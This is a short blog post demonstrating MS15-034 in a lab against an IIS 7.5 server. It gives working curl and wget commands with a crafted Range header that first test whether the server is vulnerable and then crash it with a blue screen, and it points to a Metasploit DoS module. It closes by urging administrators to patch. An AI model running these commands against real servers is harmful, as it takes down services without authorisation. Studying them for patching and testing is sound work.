ref: https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/
Here is a simple demonstration
Attacker: Kali Linux
Victim: Windows 2008 Server R2, IIS 7.5 (192.168.182.154)
1. Using a curl command to test if the server is vulnerable:
curl -v 192.168.182.154/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
If it returns "Requested Header Range Not Satisfiable", the server may be vulnerable.
2. If the server seems to be vulnerable, changing the Range to be "Range:bytes=18-18446744073709551615" can cause DOS / BSOD of the server. Let's try a simple wget command, request an existing resource "welcome.png"
for curl, removing the quotes of the Range header, it will also work: (probably just freezing the system but not BSOD)
curl -v "192.168.182.154/welcome.png" -H Range:bytes=18-18446744073709551615
Command: wget --header="Range: bytes=18-18446744073709551615" http://192.168.182.154/welcome.png
On the other hand, our victim crashed with BSOD :-(....
After reboot, it gives another BSOD. (but sometimes it didn't give BSOD when reboot)
edited: Another BSOD most likely because the wget request keeps trying, so once the system is booted up, it accepts the requests and crashed again. Thanks for my friend's explanation.
3. Using Metasploit's module can also achieve the DOS.
ref: http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
As soon as the module is executed, the server is down...(not fast enough to capture at the first shot, so there're two trials :)...)
From the above demonstration, we can see how easily the server can be brought down, time to review and harden the IIS servers my friends~
Nice write-up :)
ReplyDeleteLike !
ReplyDelete